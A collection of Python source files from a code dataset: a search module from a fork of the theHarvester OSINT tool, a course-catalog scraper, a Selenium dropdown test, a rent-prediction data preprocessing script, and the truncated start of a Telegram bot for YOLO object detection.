+{"seq_id":"8529892059","text":"import myparser\r\nimport requests\r\n\r\nclass search_google_labs:\r\n\r\n def __init__(self, list):\r\n self.results = \"\"\r\n self.totalresults = \"\"\r\n self.server = \"labs.google.com\"\r\n self.hostname = \"labs.google.com\"\r\n self.userAgent = \"(Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6\"\r\n id = 0\r\n self.set = \"\"\r\n for x in list:\r\n id += 1\r\n if id == 1:\r\n self.set = self.set + \"q\" + str(id) + \"=\" + str(x)\r\n else:\r\n self.set = self.set + \"&q\" + str(id) + \"=\" + str(x)\r\n\r\n def do_search(self):\r\n url = 'http://' + self.server + \"/sets?hl-en&\" + self.set\r\n headers = {\r\n 'Host': self.server,\r\n 'User-agent': self.userAgent\r\n }\r\n h = requests.get(url=url, headers=headers)\r\n self.results = h.text\r\n self.totalresults += self.results\r\n\r\n def get_set(self):\r\n rawres = myparser.parser(self.totalresults, list)\r\n return rawres.set()\r\n\r\n def process(self):\r\n self.do_search()\r\n","repo_name":"hkamran80/theHarvester","sub_path":"discovery/googlesets.py","file_name":"googlesets.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"}
+{"seq_id":"3443825733","text":"\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nimport json\r\n\r\n\r\ndef get_unique_key(url):\r\n return url \r\n\r\ndef make_request_using_cache(url):\r\n global header\r\n unique_ident = get_unique_key(url)\r\n\r\n ## first, look in the cache to see if we already have this data\r\n if unique_ident in CACHE_DICTION:\r\n print(\"Getting cached data...\")\r\n return CACHE_DICTION[unique_ident]\r\n\r\n ## if not, fetch the data afresh, add it to the cache,\r\n ## then write the cache to file\r\n else:\r\n print(\"Making a request for new data...\")\r\n # Make the request and cache the new data\r\n resp = requests.get(url, headers=header)\r\n CACHE_DICTION[unique_ident] = resp.text\r\n dumped_json_cache = json.dumps(CACHE_DICTION)\r\n fw = open(CACHE_FNAME,\"w\")\r\n fw.write(dumped_json_cache)\r\n fw.close() # Close the open file\r\n return CACHE_DICTION[unique_ident]\r\n\r\nclass CourseListing:\r\n def __init__(self, course_num, course_name):\r\n self.num = course_num\r\n self.name = course_name\r\n\r\n def init_from_details_url(self, details_url):\r\n global header\r\n page_text = make_request_using_cache(details_url)\r\n page_soup = BeautifulSoup(page_text, 'html.parser')\r\n self.description = page_soup.find(class_='course2desc').text\r\n\r\n def __str__(self):\r\n str_ = self.num + ' ' + self.name + '\\n\\t' + self.description\r\n return str_\r\n\r\nbaseurl = 'https://www.si.umich.edu'\r\ncatalogurl = baseurl + '/programs/courses/catalog'\r\nheader = {'User-Agent': 'SI_CLASS'}\r\npage_text = make_request_using_cache(catalogurl)\r\npage_soup = BeautifulSoup(page_text, 'html.parser')\r\nview_content_section = page_soup.find(class_='view-content')\r\ntable_rows = view_content_section.find_all('tr')\r\n\r\ncourse_listings = []\r\n# changing the loop for debugging -- test on a subset before doing all of them\r\n#for row in table_rows:\r\nfor i in range(4):\r\n row = table_rows[i]\r\n cells = row.find_all('td')\r\n if len(cells) == 2:\r\n course_num = cells[0].text.strip()\r\n course_name = cells[1].text.strip()\r\n # this gets rid of extra lines--only the first line of\r\n # multi-line names is kept\r\n course_name = course_name.split('\\n')[0].strip()\r\n # this gets rid of a trailing colon if it exists\r\n if course_name[-1] == ':':\r\n course_name = course_name[:-1]\r\n\r\n course_listing = CourseListing(course_num, course_name)\r\n details_url = baseurl + cells[0].find('a')['href']\r\n course_listing.init_from_details_url(details_url)\r\n course_listings.append(course_listing)\r\n\r\nfor cl in course_listings:\r\n print(cl)\r\n print('_'*40)","repo_name":"EMeireles/SI_206","sub_path":"Lecture Exercises/Lec9/lec13.py","file_name":"lec13.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"10180247349","text":"import time\nfrom selenium import webdriver\ndriver = webdriver.Chrome(executable_path=\"C:\\\\Users\\\\amit_pc\\\\Documents\\\\Study materials\\\\python\\\\Seleium\\\\chromedriver.exe\")\n\ndriver.get('https://rahulshettyacademy.com/dropdownsPractise/')\n\ndriver.maximize_window()\n\ndriver.find_element_by_id('autosuggest').send_keys('ind')\n\ntime.sleep(5)\n\nlist_country = driver.find_elements_by_css_selector(\"li[class='ui-menu-item'] a\")\n\nprint('length of country = ', len(list_country))\n\nfor country in list_country:\n #if country found is india then loop breaks out\n if country.text == 'India':\n country.click()\n break\n\nprint(driver.find_element_by_id('autosuggest').text)\n\nassert driver.find_element_by_id('autosuggest').get_attribute('value') == \"India\"\n\n\n#extract all the checkboxes in a single list so that it can be iterated in a for loop\ndriver.quit()","repo_name":"amits0003/Selenium_Study_Files","sub_path":"SeleniumTest/autosuggested_drop_down_test.py","file_name":"autosuggested_drop_down_test.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"18967643511","text":"import json\nimport random\nfrom collections import OrderedDict\nfrom City_Data import city_data_service\n\n\n# Lade die Daten\ndef load_data(file_name):\n with open(file_name, 'r', encoding='utf-8') as file:\n loaded_data = json.load(file)\n return loaded_data\n\n\n# Sonderzeichen behandeln\ndef handle_special_characters(value):\n if isinstance(value, str): # Überprüfen, ob der Wert ein String ist\n # Umlaute umwandeln\n value = value.replace(\"ß\", \"ss\")\n value = value.replace(\"ä\", \"ae\")\n value = value.replace(\"Ä\", \"Ae\")\n value = value.replace(\"Ü\", \"Ue\")\n value = value.replace(\"ü\", \"ue\")\n value = value.replace(\"ö\", \"oe\")\n return value\n\n\n# Sonderzeichen in den geladenen Daten ersetzen\ndef handle_special_chars_in_data(loaded_data):\n decoded_data = []\n for dictionary in loaded_data:\n new_dict = {}\n for key, value in dictionary.items():\n new_dict[key] = handle_special_characters(value)\n decoded_data.append(new_dict)\n return decoded_data\n\n\n# Speichern der endgültigen Daten in eine JSON-Datei\ndef save_to_json(data, output_filename):\n with open(output_filename, 'w', encoding='utf-8') as file:\n json.dump(data, file, ensure_ascii=False, indent=2)\n\n\n# Daten splitten\ndef handle_datasplit(loaded_data):\n splitted_data = []\n for data in loaded_data:\n new_dict = {}\n for key, value in data.items():\n new_dict[key] = change_values_to_zero_one(key, value)\n splitted_data.append(new_dict)\n return splitted_data\n\n\n# Daten in Integer 0,1 umwandeln\ndef change_values_to_zero_one(key, value):\n if isinstance(value, bool): # Überprüfen ob der Wert Boolean ist\n value = int(value)\n else:\n if isinstance(key, str):\n if key == \"roomCount\": # Raumanzahl verarbeiten\n value = value\n\n return value\n\n\n# Daten transformieren\ndef splitdata(loaded_data, attributeList):\n attribute_Map = OrderedDict() # Map mit gewählten Attributen aufbauen\n for attribute in attributeList:\n attribute_Map[attribute] = []\n for eintrag in loaded_data: # Map mit values füllen\n for attribute in attributeList:\n value = attribute_Map[attribute]\n if str(eintrag[attribute]) not in value: # Überprüfen auf doppelte Werte\n value.append(eintrag[attribute])\n attribute_Map[attribute] = value\n for eintrag in loaded_data:\n for key in attribute_Map:\n for value in attribute_Map[key]:\n eintrag[key + ' ' + str(value)] = 0 # Inital auf Null setzen\n eintrag[key + ' ' + str(eintrag[key])] = 1\n eintrag.pop(key)\n return loaded_data\n\n\n# Attribute entfernen\ndef pop_Attribute(loaded_data, attributeList):\n for eintrag in loaded_data:\n for attribute in attributeList:\n eintrag.pop(attribute, None)\n return loaded_data\n\ndef generate_features(data):\n loaded_data = data.copy()\n loaded_data = handle_special_chars_in_data(loaded_data)\n\n # Umwandeln der Attribute\n loaded_data = splitdata(loaded_data,\n ['houseType', 'bundesland']) # , 'stadt', 'livingSpace', 'houseType', 'bundesland'\n loaded_data = handle_datasplit(loaded_data)\n\n for data in loaded_data:\n data.update(city_data_service.get_location_statistics(data[\"Latitude\"], data[\"Longitude\"], data[\"year\"] + 2000))\n\n # Entfernen von Attributen\n loaded_data = pop_Attribute(loaded_data,\n ['stadtteil', 'plz', 'strasse', 'address', 'stadt', 'Latitude', 'Longitude'])\n\n return loaded_data\n\ndef main():\n input_filename_1 = '../Historical_Data/trainingData_located2010_2.json'\n input_filename_2 = '../Historical_Data/trainingData_located2011_2.json'\n input_filename_3 = 
'../Historical_Data/trainingData_located2012_2.json'\n input_filename_4 = '../Historical_Data/trainingData_located2013_2.json'\n input_filename_5 = '../Historical_Data/trainingData_located2014_2.json'\n input_filename_6 = '../Historical_Data/trainingData_located2015_2.json'\n input_filename_7 = '../Historical_Data/trainingData_located2016_2.json'\n input_filename_8 = '../Historical_Data/trainingData_located2017_2.json'\n input_filename_9 = '../Historical_Data/trainingData_located2018_2.json'\n input_filename_10 = '../Historical_Data/trainingData_located2019_2.json'\n input_filename_11 = '../Historical_Data/trainingData_located2020_2.json'\n input_filename_12 = '../Historical_Data/trainingData_located2021_2.json'\n output_filename = \"final_data_2.json\"\n\n # Lade die Daten ein\n loaded_data = load_data(input_filename_1)\n loaded_data.extend(load_data(input_filename_2))\n loaded_data.extend(load_data(input_filename_3))\n loaded_data.extend(load_data(input_filename_4))\n loaded_data.extend(load_data(input_filename_5))\n loaded_data.extend(load_data(input_filename_6))\n loaded_data.extend(load_data(input_filename_7))\n loaded_data.extend(load_data(input_filename_8))\n loaded_data.extend(load_data(input_filename_9))\n loaded_data.extend(load_data(input_filename_10))\n loaded_data.extend(load_data(input_filename_11))\n loaded_data.extend(load_data(input_filename_12))\n\n # Handle special characters\n loaded_data = handle_special_chars_in_data(loaded_data)\n\n # Umwandeln der Attribute\n loaded_data = splitdata(loaded_data,\n ['houseType', 'bundesland']) # , 'stadt', 'livingSpace', 'houseType', 'bundesland'\n loaded_data = handle_datasplit(loaded_data)\n\n for data in loaded_data:\n data.update(city_data_service.get_location_statistics(data[\"Latitude\"], data[\"Longitude\"], data[\"year\"] + 2000))\n\n # Entfernen von Attributen\n loaded_data = pop_Attribute(loaded_data, ['stadtteil', 'plz', 'strasse', 'address', 'stadt', 'Latitude', 'Longitude'])\n\n # Speichern der endgültigen Daten in eine JSON-Datei\n print(\"Udpated: \" + str(len(loaded_data)))\n save_to_json(loaded_data, output_filename)\n\n\ndef main_2():\n input_filename = 'final_data_2_timeline_fut.json'\n output_filename = \"final_data_3d_fut.json\"\n\n # Lade die Daten ein\n loaded_data = load_data(input_filename)\n\n # Handle special characters\n loaded_data = handle_special_chars_in_data(loaded_data)\n\n # Umwandeln der Attribute\n loaded_data = splitdata(loaded_data, ['houseType', 'bundesland'])\n loaded_data = handle_datasplit(loaded_data)\n\n max_id = 0\n for data in loaded_data:\n data.update(city_data_service.get_location_statistics(data[\"Latitude\"], data[\"Longitude\"], data[\"year\"] + 2000))\n if data[\"id\"] > max_id:\n max_id = data[\"id\"]\n\n # Entfernen von Attributen\n loaded_data = pop_Attribute(loaded_data,\n ['stadtteil', 'plz', 'strasse', 'address', 'stadt', 'Latitude', 'Longitude'])\n\n res_list = []\n for i in range(0, max_id):\n res_list.append(list())\n\n for data in loaded_data:\n #id = data.pop(\"id\")\n id = data[\"id\"]\n res_list[id - 1].append(data)\n\n run = 0\n while run < len(res_list):\n res_list[run] = sorted(res_list[run], key=lambda x: x[\"year\"])\n run += 1\n\n # Speichern der endgültigen Daten in eine JSON-Datei\n save_to_json(res_list, output_filename)\n\n\ndef get_equal(full_data_list):\n same_list = list()\n fst_data = full_data_list.pop(0)\n same_list.append(fst_data)\n run = 0\n while run < len(full_data_list):\n data = full_data_list[run]\n if fst_data[\"strasse\"] == data[\"strasse\"] 
and fst_data[\"stadt\"] == data[\"stadt\"] and \\\n fst_data[\"stadtteil\"] == data[\"stadtteil\"] and fst_data[\"plz\"] == data[\"plz\"]:\n same_list.append(full_data_list.pop(run))\n else:\n run += 1\n return same_list\n\n\ndef _split_in_training_and_test_data(total_data: list):\n training_data = list()\n test_data = list()\n for data in total_data:\n if random.random() <= 0.8:\n _add_random_order(training_data, data)\n else:\n _add_random_order(test_data, data)\n return training_data, test_data\n\n\ndef _add_random_order(data_list, elem):\n if random.random() > 0.5:\n data_list.append(elem)\n else:\n data_list.insert(0, elem)\n\n\ndef _build_raw_data_2():\n input_filename_1 = '../Historical_Data/trainingData_located2010_2.json'\n input_filename_2 = '../Historical_Data/trainingData_located2011_2.json'\n input_filename_3 = '../Historical_Data/trainingData_located2012_2.json'\n input_filename_4 = '../Historical_Data/trainingData_located2013_2.json'\n input_filename_5 = '../Historical_Data/trainingData_located2014_2.json'\n input_filename_6 = '../Historical_Data/trainingData_located2015_2.json'\n input_filename_7 = '../Historical_Data/trainingData_located2016_2.json'\n input_filename_8 = '../Historical_Data/trainingData_located2017_2.json'\n input_filename_9 = '../Historical_Data/trainingData_located2018_2.json'\n input_filename_10 = '../Historical_Data/trainingData_located2019_2.json'\n input_filename_11 = '../Historical_Data/trainingData_located2020_2.json'\n input_filename_12 = '../Historical_Data/trainingData_located2021_2.json'\n input_filename_13 = '../Historical_Data/trainingData_fut_2022.json'\n input_filename_14 = '../Historical_Data/trainingData_fut_2023.json'\n input_filename_15 = '../Historical_Data/trainingData_fut_2024.json'\n input_filename_16 = '../Historical_Data/trainingData_fut_2025.json'\n output_filename = \"final_data_2_timeline_fut.json\"\n\n # Lade die Daten ein\n loaded_data_1 = handle_special_chars_in_data(load_data(input_filename_1))\n loaded_data_2 = handle_special_chars_in_data(load_data(input_filename_2))\n loaded_data_3 = handle_special_chars_in_data(load_data(input_filename_3))\n loaded_data_4 = handle_special_chars_in_data(load_data(input_filename_4))\n loaded_data_5 = handle_special_chars_in_data(load_data(input_filename_5))\n loaded_data_6 = handle_special_chars_in_data(load_data(input_filename_6))\n loaded_data_7 = handle_special_chars_in_data(load_data(input_filename_7))\n loaded_data_8 = handle_special_chars_in_data(load_data(input_filename_8))\n loaded_data_9 = handle_special_chars_in_data(load_data(input_filename_9))\n loaded_data_10 = handle_special_chars_in_data(load_data(input_filename_10))\n loaded_data_11 = handle_special_chars_in_data(load_data(input_filename_11))\n loaded_data_12 = handle_special_chars_in_data(load_data(input_filename_12))\n loaded_data_13 = handle_special_chars_in_data(load_data(input_filename_13))\n loaded_data_14 = handle_special_chars_in_data(load_data(input_filename_14))\n loaded_data_15 = handle_special_chars_in_data(load_data(input_filename_15))\n loaded_data_16 = handle_special_chars_in_data(load_data(input_filename_16))\n\n highest_id = 0\n data_list = list()\n while len(loaded_data_2) > 0 or len(loaded_data_3) > 0 or len(loaded_data_4) > 0 or len(loaded_data_5) > 0 \\\n or len(loaded_data_6) > 0 or len(loaded_data_7) > 0 or len(loaded_data_8) > 0 or len(loaded_data_9) > 0 \\\n or len(loaded_data_10) > 0 or len(loaded_data_11) > 0 or len(loaded_data_12) > 0 or len(loaded_data_13) > 0 \\\n or len(loaded_data_14) > 0 or 
len(loaded_data_15) > 0 or len(loaded_data_16) > 0:\n print(len(loaded_data_2))\n if len(loaded_data_2) > 0:\n data_2 = loaded_data_2.pop(0)\n else:\n data_2 = None\n if len(loaded_data_3) > 0:\n data_3 = loaded_data_3.pop(0)\n else:\n data_3 = None\n if len(loaded_data_4) > 0:\n data_4 = loaded_data_4.pop(0)\n else:\n data_4 = None\n if len(loaded_data_5) > 0:\n data_5 = loaded_data_5.pop(0)\n else:\n data_5 = None\n if len(loaded_data_6) > 0:\n data_6 = loaded_data_6.pop(0)\n else:\n data_6 = None\n if len(loaded_data_7) > 0:\n data_7 = loaded_data_7.pop(0)\n else:\n data_7 = None\n if len(loaded_data_8) > 0:\n data_8 = loaded_data_8.pop(0)\n else:\n data_8 = None\n if len(loaded_data_9) > 0:\n data_9 = loaded_data_9.pop(0)\n else:\n data_9 = None\n if len(loaded_data_10) > 0:\n data_10 = loaded_data_10.pop(0)\n else:\n data_10 = None\n if len(loaded_data_11) > 0:\n data_11 = loaded_data_11.pop(0)\n else:\n data_11 = None\n if len(loaded_data_12) > 0:\n data_12 = loaded_data_12.pop(0)\n else:\n data_12 = None\n if len(loaded_data_13) > 0:\n data_13 = loaded_data_13.pop(0)\n else:\n data_13 = None\n if len(loaded_data_14) > 0:\n data_14 = loaded_data_14.pop(0)\n else:\n data_14 = None\n if len(loaded_data_15) > 0:\n data_15 = loaded_data_15.pop(0)\n else:\n data_15 = None\n if len(loaded_data_16) > 0:\n data_16 = loaded_data_16.pop(0)\n else:\n data_16 = None\n\n run = 0\n while run < len(loaded_data_1) and (data_2 is not None or data_3 is not None or data_4 is not None \\\n or data_5 is not None or data_6 is not None or data_7 is not None or data_8 is not None \\\n or data_9 is not None or data_10 is not None or data_11 is not None or data_12 is not None):\n data_1 = loaded_data_1[run]\n if data_2 is not None and data_1[\"Latitude\"] == data_2[\"Latitude\"] \\\n and data_1[\"Longitude\"] == data_2[\"Longitude\"] and data_1[\"livingSpace\"] == data_2[\"livingSpace\"] \\\n and data_1[\"roomCount\"] == data_2[\"roomCount\"] and data_1[\"propertyAge\"] == data_2[\"propertyAge\"] \\\n and data_1[\"houseType\"] == data_2[\"houseType\"]:\n if \"id\" in data_1:\n data_2[\"id\"] = data_1[\"id\"]\n else:\n highest_id += 1\n data_1[\"id\"] = highest_id\n data_2[\"id\"] = highest_id\n data_list.append(data_2)\n data_2 = None\n if data_3 is not None and data_1[\"Latitude\"] == data_3[\"Latitude\"] \\\n and data_1[\"Longitude\"] == data_3[\"Longitude\"] and data_1[\"livingSpace\"] == data_3[\"livingSpace\"] \\\n and data_1[\"roomCount\"] == data_3[\"roomCount\"] and data_1[\"propertyAge\"] == data_3[\"propertyAge\"] \\\n and data_1[\"houseType\"] == data_3[\"houseType\"]:\n if \"id\" in data_1:\n data_3[\"id\"] = data_1[\"id\"]\n else:\n highest_id += 1\n data_1[\"id\"] = highest_id\n data_3[\"id\"] = highest_id\n data_list.append(data_3)\n data_3 = None\n if data_4 is not None and data_1[\"Latitude\"] == data_4[\"Latitude\"] \\\n and data_1[\"Longitude\"] == data_4[\"Longitude\"] and data_1[\"livingSpace\"] == data_4[\"livingSpace\"] \\\n and data_1[\"roomCount\"] == data_4[\"roomCount\"] and data_1[\"propertyAge\"] == data_4[\"propertyAge\"] \\\n and data_1[\"houseType\"] == data_4[\"houseType\"]:\n if \"id\" in data_1:\n data_4[\"id\"] = data_1[\"id\"]\n else:\n highest_id += 1\n data_1[\"id\"] = highest_id\n data_4[\"id\"] = highest_id\n data_list.append(data_4)\n data_4 = None\n if data_5 is not None and data_1[\"Latitude\"] == data_5[\"Latitude\"] \\\n and data_1[\"Longitude\"] == data_5[\"Longitude\"] and data_1[\"livingSpace\"] == data_5[\"livingSpace\"] \\\n and data_1[\"roomCount\"] == 
data_5[\"roomCount\"] and data_1[\"propertyAge\"] == data_5[\"propertyAge\"] \\\n and data_1[\"houseType\"] == data_5[\"houseType\"]:\n if \"id\" in data_1:\n data_5[\"id\"] = data_1[\"id\"]\n else:\n highest_id += 1\n data_1[\"id\"] = highest_id\n data_5[\"id\"] = highest_id\n data_list.append(data_5)\n data_5 = None\n if data_6 is not None and data_1[\"Latitude\"] == data_6[\"Latitude\"] \\\n and data_1[\"Longitude\"] == data_6[\"Longitude\"] and data_1[\"livingSpace\"] == data_6[\"livingSpace\"] \\\n and data_1[\"roomCount\"] == data_6[\"roomCount\"] and data_1[\"propertyAge\"] == data_6[\"propertyAge\"] \\\n and data_1[\"houseType\"] == data_6[\"houseType\"]:\n if \"id\" in data_1:\n data_6[\"id\"] = data_1[\"id\"]\n else:\n highest_id += 1\n data_1[\"id\"] = highest_id\n data_6[\"id\"] = highest_id\n data_list.append(data_6)\n data_6 = None\n if data_7 is not None and data_1[\"Latitude\"] == data_7[\"Latitude\"] \\\n and data_1[\"Longitude\"] == data_7[\"Longitude\"] and data_1[\"livingSpace\"] == data_7[\"livingSpace\"] \\\n and data_1[\"roomCount\"] == data_7[\"roomCount\"] and data_1[\"propertyAge\"] == data_7[\"propertyAge\"] \\\n and data_1[\"houseType\"] == data_7[\"houseType\"]:\n if \"id\" in data_1:\n data_7[\"id\"] = data_1[\"id\"]\n else:\n highest_id += 1\n data_1[\"id\"] = highest_id\n data_7[\"id\"] = highest_id\n data_list.append(data_7)\n data_7 = None\n if data_8 is not None and data_1[\"Latitude\"] == data_8[\"Latitude\"] \\\n and data_1[\"Longitude\"] == data_8[\"Longitude\"] and data_1[\"livingSpace\"] == data_8[\"livingSpace\"] \\\n and data_1[\"roomCount\"] == data_8[\"roomCount\"] and data_1[\"propertyAge\"] == data_8[\"propertyAge\"] \\\n and data_1[\"houseType\"] == data_8[\"houseType\"]:\n if \"id\" in data_1:\n data_8[\"id\"] = data_1[\"id\"]\n else:\n highest_id += 1\n data_1[\"id\"] = highest_id\n data_8[\"id\"] = highest_id\n data_list.append(data_8)\n data_8 = None\n if data_9 is not None and data_1[\"Latitude\"] == data_9[\"Latitude\"] \\\n and data_1[\"Longitude\"] == data_9[\"Longitude\"] and data_1[\"livingSpace\"] == data_9[\"livingSpace\"] \\\n and data_1[\"roomCount\"] == data_9[\"roomCount\"] and data_1[\"propertyAge\"] == data_9[\"propertyAge\"] \\\n and data_1[\"houseType\"] == data_9[\"houseType\"]:\n if \"id\" in data_1:\n data_9[\"id\"] = data_1[\"id\"]\n else:\n highest_id += 1\n data_1[\"id\"] = highest_id\n data_9[\"id\"] = highest_id\n data_list.append(data_9)\n data_9 = None\n if data_10 is not None and data_1[\"Latitude\"] == data_10[\"Latitude\"] \\\n and data_1[\"Longitude\"] == data_10[\"Longitude\"] and data_1[\"livingSpace\"] == data_10[\"livingSpace\"] \\\n and data_1[\"roomCount\"] == data_10[\"roomCount\"] and data_1[\"propertyAge\"] == data_10[\"propertyAge\"] \\\n and data_1[\"houseType\"] == data_10[\"houseType\"]:\n if \"id\" in data_1:\n data_10[\"id\"] = data_1[\"id\"]\n else:\n highest_id += 1\n data_1[\"id\"] = highest_id\n data_10[\"id\"] = highest_id\n data_list.append(data_10)\n data_10 = None\n if data_11 is not None and data_1[\"Latitude\"] == data_11[\"Latitude\"] \\\n and data_1[\"Longitude\"] == data_11[\"Longitude\"] and data_1[\"livingSpace\"] == data_11[\"livingSpace\"] \\\n and data_1[\"roomCount\"] == data_11[\"roomCount\"] and data_1[\"propertyAge\"] == data_11[\"propertyAge\"] \\\n and data_1[\"houseType\"] == data_11[\"houseType\"]:\n if \"id\" in data_1:\n data_11[\"id\"] = data_1[\"id\"]\n else:\n highest_id += 1\n data_1[\"id\"] = highest_id\n data_11[\"id\"] = highest_id\n data_list.append(data_11)\n 
data_11 = None\n if data_12 is not None and data_1[\"Latitude\"] == data_12[\"Latitude\"] \\\n and data_1[\"Longitude\"] == data_12[\"Longitude\"] and data_1[\"livingSpace\"] == data_12[\"livingSpace\"] \\\n and data_1[\"roomCount\"] == data_12[\"roomCount\"] and data_1[\"propertyAge\"] == data_12[\"propertyAge\"] \\\n and data_1[\"houseType\"] == data_12[\"houseType\"]:\n if \"id\" in data_1:\n data_12[\"id\"] = data_1[\"id\"]\n else:\n highest_id += 1\n data_1[\"id\"] = highest_id\n data_12[\"id\"] = highest_id\n data_list.append(data_12)\n data_12 = None\n if data_13 is not None and data_1[\"Latitude\"] == data_13[\"Latitude\"] \\\n and data_1[\"Longitude\"] == data_13[\"Longitude\"] and data_1[\"livingSpace\"] == data_13[\"livingSpace\"] \\\n and data_1[\"roomCount\"] == data_13[\"roomCount\"] and data_1[\"propertyAge\"] == data_13[\"propertyAge\"] \\\n and data_1[\"houseType\"] == data_13[\"houseType\"]:\n if \"id\" in data_1:\n data_13[\"id\"] = data_1[\"id\"]\n else:\n highest_id += 1\n data_1[\"id\"] = highest_id\n data_13[\"id\"] = highest_id\n data_list.append(data_13)\n data_13 = None\n if data_14 is not None and data_1[\"Latitude\"] == data_14[\"Latitude\"] \\\n and data_1[\"Longitude\"] == data_14[\"Longitude\"] and data_1[\"livingSpace\"] == data_14[\"livingSpace\"] \\\n and data_1[\"roomCount\"] == data_14[\"roomCount\"] and data_1[\"propertyAge\"] == data_14[\"propertyAge\"] \\\n and data_1[\"houseType\"] == data_14[\"houseType\"]:\n if \"id\" in data_1:\n data_14[\"id\"] = data_1[\"id\"]\n else:\n highest_id += 1\n data_1[\"id\"] = highest_id\n data_14[\"id\"] = highest_id\n data_list.append(data_14)\n data_14 = None\n if data_15 is not None and data_1[\"Latitude\"] == data_15[\"Latitude\"] \\\n and data_1[\"Longitude\"] == data_15[\"Longitude\"] and data_1[\"livingSpace\"] == data_15[\"livingSpace\"] \\\n and data_1[\"roomCount\"] == data_15[\"roomCount\"] and data_1[\"propertyAge\"] == data_15[\"propertyAge\"] \\\n and data_1[\"houseType\"] == data_15[\"houseType\"]:\n if \"id\" in data_1:\n data_15[\"id\"] = data_1[\"id\"]\n else:\n highest_id += 1\n data_1[\"id\"] = highest_id\n data_15[\"id\"] = highest_id\n data_list.append(data_15)\n data_15 = None\n if data_16 is not None and data_1[\"Latitude\"] == data_16[\"Latitude\"] \\\n and data_1[\"Longitude\"] == data_16[\"Longitude\"] and data_1[\"livingSpace\"] == data_16[\"livingSpace\"] \\\n and data_1[\"roomCount\"] == data_16[\"roomCount\"] and data_1[\"propertyAge\"] == data_16[\"propertyAge\"] \\\n and data_1[\"houseType\"] == data_16[\"houseType\"]:\n if \"id\" in data_1:\n data_16[\"id\"] = data_1[\"id\"]\n else:\n highest_id += 1\n data_1[\"id\"] = highest_id\n data_16[\"id\"] = highest_id\n data_list.append(data_16)\n data_16 = None\n run += 1\n data_list.extend(loaded_data_1)\n save_to_json(data_list, output_filename)\n\n\ndef remove_double(data_list):\n result_list = list()\n double_data_count = 0\n\n while len(data_list) > 0:\n run = 0\n data = data_list.pop(0)\n while run < len(data_list):\n d = data_list[run]\n if data is not None and data[\"Latitude\"] == d[\"Latitude\"] and data[\"Longitude\"] == d[\"Longitude\"] \\\n and data[\"livingSpace\"] == d[\"livingSpace\"] and data[\"roomCount\"] == d[\"roomCount\"] \\\n and data[\"propertyAge\"] == d[\"propertyAge\"] and data[\"houseType\"] == d[\"houseType\"]:\n data_list.pop(run)\n double_data_count += 1\n else:\n run += 1\n result_list.append(data)\n print(\"Duplicates: \" + str(double_data_count))\n return result_list\n\n\ndef create_future_data(data):\n 
data_list_2022 = list()\n data_list_2023 = list()\n data_list_2024 = list()\n data_list_2025 = list()\n\n for d in data:\n d.pop(\"rent\")\n d[\"year\"] = 22\n data_list_2022.append(d.copy())\n d[\"year\"] = 23\n data_list_2023.append(d.copy())\n d[\"year\"] = 24\n data_list_2024.append(d.copy())\n d[\"year\"] = 25\n data_list_2025.append(d.copy())\n\n save_to_json(data_list_2022, '../Historical_Data/trainingData_fut_2022.json')\n save_to_json(data_list_2023, '../Historical_Data/trainingData_fut_2023.json')\n save_to_json(data_list_2024, '../Historical_Data/trainingData_fut_2024.json')\n save_to_json(data_list_2025, '../Historical_Data/trainingData_fut_2025.json')\n\n\nif __name__ == \"__main__\":\n # Erstelle Trainingsvariablen aus Daten\n # main()\n\n main_2()\n\n# Erstellen der Zukünftigen Rohdaten\n #data = load_data('../Historical_Data/trainingData_located2021_2.json')\n #create_future_data(data)\n\n# Gleiche Immobilenstammdaten aus den verschiedenen Jahren werden mit der salben ID versehen um sie\n# folgend und eine 3d Liste zusammenführen zu können.\n# _build_raw_data_2()\n# data = load_data('final_data_2_timeline.json')\n# i = 0\n# for d in data:\n# if not 'id' in d:\n# i += 1\n# print(\"No ID: \" + str(i))\n\n# num_list = list()\n# for i in range(0, 117360):\n# num_list.append(0)\n\n# for d in data:\n# if 'id' in d:\n# num_list[d['id']] += 1\n# print(num_list)\n\n# Löschen doppelter Werte in Liste\n# data = load_data('../Historical_Data/trainingData_located2021.json')\n# print(len(data))\n# data = remove_double(data)\n# save_to_json(data, '../Historical_Data/trainingData_located2021_2.json')\n\n# Aufteilen in Training und Test Daten\n# total_data_list = load_data('final_data_2.json')\n# training_data, test_data = _split_in_training_and_test_data(total_data_list)\n# save_to_json(training_data, 'training_data_2.json')\n# save_to_json(test_data, 'test_data_2.json')\n","repo_name":"Allibibo/KI_mietpreis_prognose","sub_path":"City_Data/Attribute.py","file_name":"Attribute.py","file_ext":"py","file_size_in_byte":27003,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"74580756994","text":"from io import BytesIO\nimport logging\nfrom datetime import datetime\n\nimport cv2\nimport torch\nimport numpy as np\nfrom PIL import Image\nfrom tqdm import tqdm\nfrom telegram.ext import *\n\nDEVICE = 'cpu'\nTHICKNESS = 2\nFONT_SCALE = 1\nCOLOR = (255, 0, 0)\nLIST_OBJ = ['знак', 'мусор']\nFONT = cv2.FONT_HERSHEY_COMPLEX\nWEIGHTS = 'PATH_YOUR_MODEL'\nMODEL_YOLO = torch.hub.load('ultralytics/yolov5', 'custom', WEIGHTS, device=DEVICE, force_reload=True)\nMODEL_YOLO.conf = 0.8\n\nwith open('token.txt', 'r') as f:\n TOKEN = f.read()\n\n\ndef start(update, context):\n update.message.reply_text('Приветствую! Я бот для нахождения дорожных знаков и мусора для СКПДИ. '\n 'Отправь фото или видео и получи ответ')\n\n\ndef help(update, context):\n update.message.reply_text(\"\"\"\n /start - Вступительная информация\n /help - Показать это сообщение\n \"\"\")\n\n\ndef handle_message(update, context):\n update.message.reply_text('Отправь фото')\n\n\ndef handle_photo(update, context):\n start_time = datetime.now()\n file = context.bot.get_file(update.message.photo[-1].file_id)\n f = BytesIO(file.download_as_bytearray())\n file_bytes = np.asarray(bytearray(f.read()), dtype=np.uint8)\n img = cv2.imdecode(file_bytes, cv2.IMREAD_COLOR)\n img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n result = 